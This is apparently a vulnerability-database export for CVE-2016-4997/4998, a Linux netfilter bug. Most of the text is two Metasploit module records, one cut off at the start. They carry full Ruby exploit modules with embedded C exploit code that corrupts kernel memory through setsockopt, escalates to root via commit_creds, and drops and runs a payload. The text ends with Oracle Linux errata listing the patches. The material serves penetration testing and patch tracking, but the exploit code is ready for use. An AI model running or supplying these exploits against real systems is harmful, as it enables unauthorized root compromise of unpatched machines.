xt_standard_target *target;\n unsigned i;\n\n sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);\n\n if (sock == -1) {\n perror(\"socket\");\n return -1;\n }\n\n data = malloc(MALLOC_SIZE);\n\n if (data == NULL) {\n perror(\"malloc\");\n return -1;\n }\n\n memset(data, 0, MALLOC_SIZE);\n\n repl = (struct ipt_replace *) data;\n repl->num_entries = 1;\n repl->num_counters = 1;\n repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;\n repl->valid_hooks = 0;\n\n entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));\n entry->target_offset = 74; // overwrite target_offset\n entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);\n\n ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));\n\n strcpy(ematch->u.user.name, \"icmp\");\n void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);\n uint64_t *me = (uint64_t *)(kmatch + 0x58);\n *me = 0xffffffff821de10d; // magic number!\n\n uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);\n *match = (uint32_t)kmatch;\n\n ematch->u.match_size = (short)0xffff;\n\n target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);\n uint32_t *t = (uint32_t *)target;\n *t = (uint32_t)kmatch;\n\n printf(\"[!] Decrementing the refcount. This may take a while...\\n\");\n printf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\");\n\n for (i = 0; i < 0xffffff/2+1; i++) {\n ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);\n }\n\n close(sock);\n free(data);\n printf(\"[+] Done! Now run ./pwn\\n\");\n\n return 0;\n }\n\n int main(void) {\n void *stack;\n int ret;\n\n printf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\");\n\n ret = unshare(CLONE_NEWUSER);\n\n if (ret == -1) {\n perror(\"unshare\");\n return -1;\n }\n\n stack = (void *) malloc(65536);\n\n if (stack == NULL) {\n perror(\"malloc\");\n return -1;\n }\n\n clone(decr, stack + 65536, CLONE_NEWNET, NULL);\n\n sleep(1);\n\n return 0;\n }\n }\n\n # direct copy of code from exploit-db\n pwn = %q{\n #include <stdio.h>\n #include <string.h>\n #include <errno.h>\n #include <unistd.h>\n #include <stdint.h>\n #include <fcntl.h>\n #include <sys/mman.h>\n #include <assert.h>\n\n #define MMAP_ADDR 0xff814e3000\n #define MMAP_OFFSET 0xb0\n\n typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);\n typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);\n\n void __attribute__((regparm(3))) privesc() {\n commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;\n prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\n }\n\n int main() {\n void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);\n assert(payload == (void *)MMAP_ADDR);\n\n void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);\n\n memset(shellcode, 0, 0x300000);\n\n void *ret = memcpy(shellcode, &privesc, 0x300);\n assert(ret == shellcode);\n\n printf(\"[+] Escalating privs...\\n\");\n\n int fd = open(\"/dev/ptmx\", O_RDWR);\n close(fd);\n\n assert(!getuid());\n\n printf(\"[+] We've got root!\");\n\n return execl(\"/bin/bash\", \"-sh\", NULL);\n }\n }\n\n # the original code printed a line. However, this is hard to detect due to threading.\n # so instead we can write a file in /tmp to catch.\n decr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/,\n \"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" )\n\n # patch in to run our payload\n pwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/,\n \"execl(\\\"#{payload_path}\\\", NULL);\")\n\n def pwn(payload_path, pwn_file, pwn, compile)\n # lets write our payload since everythings set for priv esc\n vprint_status(\"Writing payload to #{payload_path}\")\n write_file(payload_path, generate_payload_exe)\n cmd_exec(\"chmod 555 #{payload_path}\")\n register_file_for_cleanup(payload_path)\n\n # now lets drop part 2, and finish up.\n rm_f pwn_file\n if compile\n print_status \"Writing pwn executable to #{pwn_file}.c\"\n rm_f \"#{pwn_file}.c\"\n write_file(\"#{pwn_file}.c\", pwn)\n cmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\")\n register_file_for_cleanup(\"#{pwn_file}.c\")\n else\n print_status \"Writing pwn executable to #{pwn_file}\"\n write_file(pwn_file, pwn)\n end\n register_file_for_cleanup(pwn_file)\n cmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\")\n end\n\n if not compile # we need to override with our pre-created binary\n # pwn file\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')\n fd = ::File.open( path, \"rb\")\n pwn = fd.read(fd.stat.size)\n fd.close\n # desc file\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')\n fd = ::File.open( path, \"rb\")\n decr = fd.read(fd.stat.size)\n fd.close\n\n # overwrite the hardcoded variable names in the compiled versions\n env_ready_file = '/tmp/okDjTFSS'\n payload_path = '/tmp/2016_4997_payload'\n end\n\n # check for shortcut\n if datastore['REEXPLOIT']\n pwn(payload_path, pwn_file, pwn, compile)\n else\n rm_f desc_file\n if compile\n print_status \"Writing desc executable to #{desc_file}.c\"\n rm_f \"#{desc_file}.c\"\n write_file(\"#{desc_file}.c\", decr)\n register_file_for_cleanup(\"#{desc_file}.c\")\n output = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\")\n else\n write_file(desc_file, decr)\n end\n rm_f env_ready_file\n register_file_for_cleanup(env_ready_file)\n #register_file_for_cleanup(desc_file)\n if not file_exist?(desc_file)\n vprint_error(\"gcc failure output: #{output}\")\n fail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\")\n end\n if target.name == \"Ubuntu\"\n vprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\"\n elsif target.name == \"Fedora\"\n vprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\"\n end\n cmd_exec(\"chmod +x #{desc_file}; #{desc_file}\")\n sec_waited = 0\n\n until sec_waited > datastore['MAXWAIT'] do\n Rex.sleep(1)\n if sec_waited % 10 == 0\n vprint_status(\"Waited #{sec_waited}s so far\")\n end\n\n if file_exist?(env_ready_file)\n print_good(\"desc finished, env ready.\")\n pwn(payload_path, pwn_file, pwn, compile)\n return\n end\n sec_waited +=1\n end\n end\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/netfilter_priv_esc.rb"}, {"lastseen": "2020-10-12T19:34:28", "description": "This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic. Several conditions have to be met for successful exploitation: Ubuntu: 1\\. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such) 2\\. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile Kernel 4.4.0-31-generic and newer are not vulnerable. This exploit does not bypass SMEP/SMAP. We write the ascii files and compile on target instead of locally since metasm bombs for not having cdefs.h (even if locally installed)\n", "published": "2016-11-18T18:52:09", "type": "metasploit", "title": "Linux Kernel 4.6.3 Netfilter Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/LOCAL/NETFILTER_PRIV_ESC_IPV4", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Linux Kernel 4.6.3 Netfilter Privilege Escalation',\n 'Description' => %q{\n This module attempts to exploit a netfilter bug on Linux Kernels before 4.6.3, and currently\n only works against Ubuntu 16.04 (not 16.04.1) with kernel 4.4.0-21-generic.\n\n Several conditions have to be met for successful exploitation:\n Ubuntu:\n 1. ip_tables.ko (ubuntu), iptable_raw (fedora) has to be loaded (root running iptables -L will do such)\n 2. libc6-dev-i386 (ubuntu), glibc-devel.i686 & libgcc.i686 (fedora) needs to be installed to compile\n Kernel 4.4.0-31-generic and newer are not vulnerable. This exploit does not bypass SMEP/SMAP.\n\n We write the ascii files and compile on target instead of locally since metasm bombs for not\n having cdefs.h (even if locally installed)\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'h00die <mike@stcyrsecurity.com>', # Module\n 'vnik', # Exploit\n 'Jesse Hertz', # Discovery\n 'Tim Newsham' # Discovery\n ],\n 'DisclosureDate' => '2016-06-03',\n 'Platform' => [ 'linux'],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' =>\n [\n [ 'Ubuntu', { } ]\n #[ 'Fedora', { } ]\n ],\n 'References' =>\n [\n ['EDB', '40049'],\n ['CVE', '2016-4997'],\n ['CVE', '2016-4998'],\n ['URL', 'https://www.openwall.com/lists/oss-security/2016/06/24/5'],\n ['URL', 'http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ce683e5f9d045e5d67d1312a42b359cb2ab2a13c'],\n ['URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6e94e0cfb0887e4013b3b930fa6ab1fe6bb6ba91']\n ],\n 'Notes' =>\n {\n 'Reliability' => [ UNRELIABLE_SESSION ],\n 'Stability' => [ CRASH_OS_DOWN ],\n },\n 'DefaultTarget' => 0))\n register_options [\n OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 180 ]),\n OptBool.new('REEXPLOIT', [ true, 'desc already ran, no need to re-run, skip to running pwn',false]),\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']])\n ]\n register_advanced_options [\n OptString.new('WritableDir', [ true, 'A directory where we can write files (must not be mounted noexec)', '/tmp' ])\n ]\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def check\n def iptables_loaded?()\n # user@ubuntu:~$ grep ip_tables /proc/modules\n # ip_tables 28672 1 iptable_filter, Live 0x0000000000000000\n # x_tables 36864 2 iptable_filter,ip_tables, Live 0x0000000000000000\n vprint_status('Checking if ip_tables is loaded in kernel')\n if target.name == \"Ubuntu\"\n iptables = read_file('/proc/modules').to_s\n if iptables.include?('ip_tables')\n vprint_good('ip_tables.ko is loaded')\n else\n print_error('ip_tables.ko is not loaded. root needs to run iptables -L or similar command')\n end\n return iptables.include?('ip_tables')\n elsif target.name == \"Fedora\"\n iptables = read_file('/proc/modules').to_s\n if iptables.include?('iptable_raw')\n vprint_good('iptable_raw is loaded')\n else\n print_error('iptable_raw is not loaded. root needs to run iptables -L or similar command')\n end\n return iptables.include?('iptable_raw')\n else\n return false\n end\n end\n\n return CheckCode::Safe unless iptables_loaded?\n\n if smep_enabled?\n print_error('SMEP enabled, system not vulnerable.')\n return CheckCode::Safe\n end\n vprint_good('SMEP is not enabled')\n\n if smap_enabled?\n print_error('SMAP enabled, system not vulnerable.')\n return CheckCode::Safe\n end\n vprint_good('SMAP is not enabled')\n\n unless userns_enabled?\n vprint_error('Unprivileged user namespaces are not permitted')\n return CheckCode::Safe\n end\n vprint_good('Unprivileged user namespaces are permitted')\n\n CheckCode::Appears\n end\n\n def exploit\n if check != CheckCode::Appears\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.\n def has_prereqs?()\n vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')\n if target.name == \"Ubuntu\"\n lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')\n if lib.include?('install')\n vprint_good('libc6-dev-i386 is installed')\n else\n print_error('libc6-dev-i386 is not installed. Compiling will fail.')\n end\n multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')\n if multilib.include?('install')\n vprint_good('gcc-multilib is installed')\n else\n print_error('gcc-multilib is not installed. Compiling will fail.')\n end\n gcc = cmd_exec('which gcc')\n if gcc.include?('gcc')\n vprint_good('gcc is installed')\n else\n print_error('gcc is not installed. Compiling will fail.')\n end\n return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')\n elsif target.name == \"Fedora\"\n lib = cmd_exec('dnf list installed | grep -E \\'(glibc-devel.i686|libgcc.i686)\\'')\n if lib.include?('glibc')\n vprint_good('glibc-devel.i686 is installed')\n else\n print_error('glibc-devel.i686 is not installed. Compiling will fail.')\n end\n if lib.include?('libgcc')\n vprint_good('libgcc.i686 is installed')\n else\n print_error('libgcc.i686 is not installed. Compiling will fail.')\n end\n multilib = false #not implemented\n gcc = false #not implemented\n return (lib.include?('glibc') && lib.include?('libgcc')) && gcc && multilib\n else\n return false\n end\n end\n\n compile = false\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\n if has_prereqs?()\n compile = true\n vprint_status('Live compiling exploit on system')\n else\n vprint_status('Dropping pre-compiled exploit on system')\n end\n end\n\n desc_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n env_ready_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n pwn_file = datastore[\"WritableDir\"] + \"/\" + rand_text_alphanumeric(8)\n payload_file = rand_text_alpha(8)\n payload_path = \"#{datastore[\"WritableDir\"]}/#{payload_file}\"\n\n # direct copy of code from exploit-db, except removed the check for smep/smap and ip_tables.ko since we can do that in the check area here\n # removed #include <netinet/in.h> per busterb comment in PR 7326\n decr = %q{\n #define _GNU_SOURCE\n #include <stdio.h>\n #include <stdlib.h>\n #include <string.h>\n #include <unistd.h>\n #include <sched.h>\n #include <netinet/in.h>\n #include <linux/sched.h>\n #include <errno.h>\n #include <sys/types.h>\n #include <sys/socket.h>\n #include <sys/ptrace.h>\n #include <net/if.h>\n #include <linux/netfilter_ipv4/ip_tables.h>\n #include <linux/netlink.h>\n #include <fcntl.h>\n #include <sys/mman.h>\n\n #define MALLOC_SIZE 66*1024\n\n int decr(void *p) {\n int sock, optlen;\n int ret;\n void *data;\n struct ipt_replace *repl;\n struct ipt_entry *entry;\n struct xt_entry_match *ematch;\n struct xt_standard_target *target;\n unsigned i;\n\n sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);\n\n if (sock == -1) {\n perror(\"socket\");\n return -1;\n }\n\n data = malloc(MALLOC_SIZE);\n\n if (data == NULL) {\n perror(\"malloc\");\n return -1;\n }\n\n memset(data, 0, MALLOC_SIZE);\n\n repl = (struct ipt_replace *) data;\n repl->num_entries = 1;\n repl->num_counters = 1;\n repl->size = sizeof(*repl) + sizeof(*target) + 0xffff;\n repl->valid_hooks = 0;\n\n entry = (struct ipt_entry *) (data + sizeof(struct ipt_replace));\n entry->target_offset = 74; // overwrite target_offset\n entry->next_offset = sizeof(*entry) + sizeof(*ematch) + sizeof(*target);\n\n ematch = (struct xt_entry_match *) (data + sizeof(struct ipt_replace) + sizeof(*entry));\n\n strcpy(ematch->u.user.name, \"icmp\");\n void *kmatch = (void*)mmap((void *)0x10000, 0x1000, 7, 0x32, 0, 0);\n uint64_t *me = (uint64_t *)(kmatch + 0x58);\n *me = 0xffffffff821de10d; // magic number!\n\n uint32_t *match = (uint32_t *)((char *)&ematch->u.kernel.match + 4);\n *match = (uint32_t)kmatch;\n\n ematch->u.match_size = (short)0xffff;\n\n target = (struct xt_standard_target *)(data + sizeof(struct ipt_replace) + 0xffff + 0x8);\n uint32_t *t = (uint32_t *)target;\n *t = (uint32_t)kmatch;\n\n printf(\"[!] Decrementing the refcount. This may take a while...\\n\");\n printf(\"[!] Wait for the \\\"Done\\\" message (even if you'll get the prompt back).\\n\");\n\n for (i = 0; i < 0xffffff/2+1; i++) {\n ret = setsockopt(sock, SOL_IP, IPT_SO_SET_REPLACE, (void *) data, 66*1024);\n }\n\n close(sock);\n free(data);\n printf(\"[+] Done! Now run ./pwn\\n\");\n\n return 0;\n }\n\n int main(void) {\n void *stack;\n int ret;\n\n printf(\"netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik\\n\");\n\n ret = unshare(CLONE_NEWUSER);\n\n if (ret == -1) {\n perror(\"unshare\");\n return -1;\n }\n\n stack = (void *) malloc(65536);\n\n if (stack == NULL) {\n perror(\"malloc\");\n return -1;\n }\n\n clone(decr, stack + 65536, CLONE_NEWNET, NULL);\n\n sleep(1);\n\n return 0;\n }\n }\n\n # direct copy of code from exploit-db\n pwn = %q{\n #include <stdio.h>\n #include <string.h>\n #include <errno.h>\n #include <unistd.h>\n #include <stdint.h>\n #include <fcntl.h>\n #include <sys/mman.h>\n #include <assert.h>\n\n #define MMAP_ADDR 0xff814e3000\n #define MMAP_OFFSET 0xb0\n\n typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred);\n typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred);\n\n void __attribute__((regparm(3))) privesc() {\n commit_creds_fn commit_creds = (void *)0xffffffff810a21c0;\n prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0;\n commit_creds(prepare_kernel_cred((uint64_t)NULL));\n }\n\n int main() {\n void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0);\n assert(payload == (void *)MMAP_ADDR);\n\n void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET);\n\n memset(shellcode, 0, 0x300000);\n\n void *ret = memcpy(shellcode, &privesc, 0x300);\n assert(ret == shellcode);\n\n printf(\"[+] Escalating privs...\\n\");\n\n int fd = open(\"/dev/ptmx\", O_RDWR);\n close(fd);\n\n assert(!getuid());\n\n printf(\"[+] We've got root!\");\n\n return execl(\"/bin/bash\", \"-sh\", NULL);\n }\n }\n\n # the original code printed a line. However, this is hard to detect due to threading.\n # so instead we can write a file in /tmp to catch.\n decr.gsub!(/printf\\(\"\\[\\+\\] Done\\! Now run \\.\\/pwn\\\\n\"\\);/,\n \"int fd2 = open(\\\"#{env_ready_file}\\\", O_RDWR|O_CREAT, 0777);close(fd2);\" )\n\n # patch in to run our payload\n pwn.gsub!(/execl\\(\"\\/bin\\/bash\", \"-sh\", NULL\\);/,\n \"execl(\\\"#{payload_path}\\\", NULL);\")\n\n def pwn(payload_path, pwn_file, pwn, compile)\n # lets write our payload since everythings set for priv esc\n vprint_status(\"Writing payload to #{payload_path}\")\n write_file(payload_path, generate_payload_exe)\n cmd_exec(\"chmod 555 #{payload_path}\")\n register_file_for_cleanup(payload_path)\n\n # now lets drop part 2, and finish up.\n rm_f pwn_file\n if compile\n print_status \"Writing pwn executable to #{pwn_file}.c\"\n rm_f \"#{pwn_file}.c\"\n write_file(\"#{pwn_file}.c\", pwn)\n cmd_exec(\"gcc #{pwn_file}.c -O2 -o #{pwn_file}\")\n register_file_for_cleanup(\"#{pwn_file}.c\")\n else\n print_status \"Writing pwn executable to #{pwn_file}\"\n write_file(pwn_file, pwn)\n end\n register_file_for_cleanup(pwn_file)\n cmd_exec(\"chmod +x #{pwn_file}; #{pwn_file}\")\n end\n\n if not compile # we need to override with our pre-created binary\n # pwn file\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')\n fd = ::File.open( path, \"rb\")\n pwn = fd.read(fd.stat.size)\n fd.close\n # desc file\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')\n fd = ::File.open( path, \"rb\")\n decr = fd.read(fd.stat.size)\n fd.close\n\n # overwrite the hardcoded variable names in the compiled versions\n env_ready_file = '/tmp/okDjTFSS'\n payload_path = '/tmp/2016_4997_payload'\n end\n\n # check for shortcut\n if datastore['REEXPLOIT']\n pwn(payload_path, pwn_file, pwn, compile)\n else\n rm_f desc_file\n if compile\n print_status \"Writing desc executable to #{desc_file}.c\"\n rm_f \"#{desc_file}.c\"\n write_file(\"#{desc_file}.c\", decr)\n register_file_for_cleanup(\"#{desc_file}.c\")\n output = cmd_exec(\"gcc #{desc_file}.c -m32 -O2 -o #{desc_file}\")\n else\n write_file(desc_file, decr)\n end\n rm_f env_ready_file\n register_file_for_cleanup(env_ready_file)\n #register_file_for_cleanup(desc_file)\n if not file_exist?(desc_file)\n vprint_error(\"gcc failure output: #{output}\")\n fail_with(Failure::Unknown, \"#{desc_file}.c failed to compile\")\n end\n if target.name == \"Ubuntu\"\n vprint_status \"Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created.\"\n elsif target.name == \"Fedora\"\n vprint_status \"Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created.\"\n end\n cmd_exec(\"chmod +x #{desc_file}; #{desc_file}\")\n sec_waited = 0\n\n until sec_waited > datastore['MAXWAIT'] do\n Rex.sleep(1)\n if sec_waited % 10 == 0\n vprint_status(\"Waited #{sec_waited}s so far\")\n end\n\n if file_exist?(env_ready_file)\n print_good(\"desc finished, env ready.\")\n pwn(payload_path, pwn_file, pwn, compile)\n return\n end\n sec_waited +=1\n end\n end\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/netfilter_priv_esc_ipv4.rb"}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:57", "bulletinFamily": "unix", "cvelist": ["CVE-2016-4997", "CVE-2016-4998"], "description": "kernel-uek\n[4.1.12-61.1.10]\n- netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian Westphal) [Orabug: 24682076] {CVE-2016-4997} {CVE-2016-4998}\n[4.1.12-61.1.9]\n- xen-blkback: don't get ref for each queue (Bob Liu) [Orabug: 24616917] \n- NVMe: Fix obtaining command result (Keith Busch) [Orabug: 24655742]\n[4.1.12-61.1.8]\n- Revert 'ixgbe: make a workaround to tx hang issue under dom' (Brian Maly) [Orabug: 24618738]\n[4.1.12-61.1.7]\n- x86/xen: Add x86_platform.is_untracked_pat_range quirk to ignore ISA regions. (Konrad Rzeszutek Wilk) [Orabug: 24566046]", "edition": 4, "modified": "2016-09-22T00:00:00", "published": "2016-09-22T00:00:00", "id": "ELSA-2016-3619", "href": "http://linux.oracle.com/errata/ELSA-2016-3619.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:32", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8374", "CVE-2016-4997", "CVE-2016-4998"], "description": "[2.6.39-400.284.2]\n- Btrfs: fix truncation of compressed and inlined extents (Divya Indi) [Orabug: 22307286] {CVE-2015-8374}\n- Btrfs: fix file corruption and data loss after cloning inline extents (Divya Indi) [Orabug: 22307286] {CVE-2015-8374}\n- netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [Orabug: 24682073] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian Westphal) [Orabug: 24682071] {CVE-2016-4997} {CVE-2016-4998}\n[2.6.39-400.284.1]\n- rds: schedule local connection activity in proper workqueue (Ajaykumar Hotchandani) [Orabug: 22819661] \n- ib_core: make wait_event uninterruptible in ib_flush_fmr_pool() (Avinash Repaka) [Orabug: 24525022] \n- net/mlx4: Support shutdown() interface (Ajaykumar Hotchandani) [Orabug: 24616261] ", "edition": 4, "modified": "2016-09-22T00:00:00", "published": "2016-09-22T00:00:00", "id": "ELSA-2016-3618", "href": "http://linux.oracle.com/errata/ELSA-2016-3618.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:43", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8374", "CVE-2016-4997", "CVE-2016-4998"], "description": "kernel-uek\n[3.8.13-118.11.2]\n- Btrfs: fix truncation of compressed and inlined extents (Ashish Samant) [Orabug: 22307285] {CVE-2015-8374}\n- Btrfs: fix file corruption and data loss after cloning inline extents (Divya Indi) [Orabug: 22307285] {CVE-2015-8374}\n- netfilter: x_tables: make sure e->next_offset covers remaining blob size (Florian Westphal) [Orabug: 24682074] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian Westphal) [Orabug: 24682074] {CVE-2016-4997} {CVE-2016-4998}\n[3.8.13-118.11.1]\n- rds: schedule local connection activity in proper workqueue (Ajaykumar Hotchandani) [Orabug: 24624195] \n- ib_core: make wait_event uninterruptible in ib_flush_fmr_pool() (Avinash Repaka) [Orabug: 24655952] \n- net/mlx4: Support shutdown() interface (Gavin Shan) [Orabug: 24624181] ", "edition": 4, "modified": "2016-09-22T00:00:00", "published": "2016-09-22T00:00:00", "id": "ELSA-2016-3617", "href": "http://linux.oracle.com/errata/ELSA-2016-3617.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:48", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696", "CVE-2016-4997", "CVE-2016-4998", "CVE-2016-3134"], "description": "- [3.10.0-327.36.1.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.36.1]\n- [x86] Use pte_none() to test for empty PTE (Larry Woodman) [1363860 1347159]\n- [x86] Disallow running with 32-bit PTEs to work around erratum (Larry Woodman) [1363860 1347159]\n- [x86] Ignore A/D bits in pte/pmd/pud_none() (Alexander Gordeev) [1363860 1347159]\n- [x86] Move swap offset/type up in PTE to work around erratum (Alexander Gordeev) [1363860 1347159]\n- [x86] cpu/intel: Introduce macros for Intel family numbers (Steve Best) [1364074 1273778]\n[3.10.0-327.35.1]\n- Revert: [x86] cpu/intel: Introduce macros for Intel family numbers (Steve Best) [1364074 1273778]\n- Revert: [x86] Move swap offset/type up in PTE to work around erratum (Larry Woodman) [1363860 1347159]\n- Revert: [x86] Ignore A/D bits in pte/pmd/pud_none() (Larry Woodman) [1363860 1347159]\n- Revert: [x86] Disallow running with 32-bit PTEs to work around erratum (Larry Woodman) [1363860 1347159]\n- Revert: [x86] Use pte_none() to test for empty PTE (Larry Woodman) [1363860 1347159]\n[3.10.0-327.34.1]\n- [x86] Use pte_none() to test for empty PTE (Larry Woodman) [1363860 1347159]\n- [x86] Disallow running with 32-bit PTEs to work around erratum (Larry Woodman) [1363860 1347159]\n- [x86] Ignore A/D bits in pte/pmd/pud_none() (Larry Woodman) [1363860 1347159]\n- [x86] Move swap offset/type up in PTE to work around erratum (Larry Woodman) [1363860 1347159]\n- [x86] cpu/intel: Introduce macros for Intel family numbers (Steve Best) [1364074 1273778]\n- [net] sctp: support ipv6 nonlocal bind (Xin Long) [1363847 1355769]\n- [fs] xfs: fix duplicate buffer flag bits (Brian Foster) [1363677 1358817]\n- [fs] sunrpc: Fix races between socket connection and destroy code (Steve Dickson) [1363617 1278540]\n- [fs] sunrpc: Add helpers to prevent socket create from racing (Steve Dickson) [1363617 1270038]\n- [acpi] battery: Accelerate battery resume callback (Jeremy McNicoll) [1363611 1270522]\n- [scsi] 3w-sas: fix command completion race (Tomas Henzl) [1362040 1294538]\n- [kernel] hrtimer: Prevent remote enqueue of leftmost timers (David Bulkow) [1361020 1323752]\n- [scsi] storvsc: Size the queue depth based on the ringbuffer size (Cathy Avery) [1360161 1287040]\n- [scsi] storvsc: Increase the ring buffer size (Cathy Avery) [1360161 1287040]\n- [scsi] vmbus: Support a vmbus API for efficiently sending page arrays (Cathy Avery) [1360161 1287040]\n- [fs] ovl: verify upper dentry in ovl_remove_and_whiteout() (Miklos Szeredi) [1364384 1359829]\n- [fs] ovl: verify upper dentry before unlink and rename (Miklos Szeredi) [1360155 1341795]\n- [fs] ovl: fix getcwd() failure after unsuccessful rmdir (Miklos Szeredi) [1360155 1341795]\n- [base] memory: fix kernel warning during memory hotplug on ppc64 (Laurent Vivier) [1357130 1276205]\n- [fs] sunrpc: increase UNX_MAXNODENAME from 32 to __NEW_UTS_LEN bytes (Benjamin Coddington) [1356880 1315390]\n- [net] tcp: enable per-socket rate limiting of all 'challenge acks' (Florian Westphal) [1355603 1355605] {CVE-2016-5696}\n- [net] tcp: uninline tcp_oow_rate_limited() (Florian Westphal) [1355603 1355605] {CVE-2016-5696}\n- [net] tcp: make challenge acks less predictable (Florian Westphal) [1355603 1355605] {CVE-2016-5696}\n- [net] netfilter: x_tables: speed up jump target validation (Florian Westphal) [1364809 1318693] 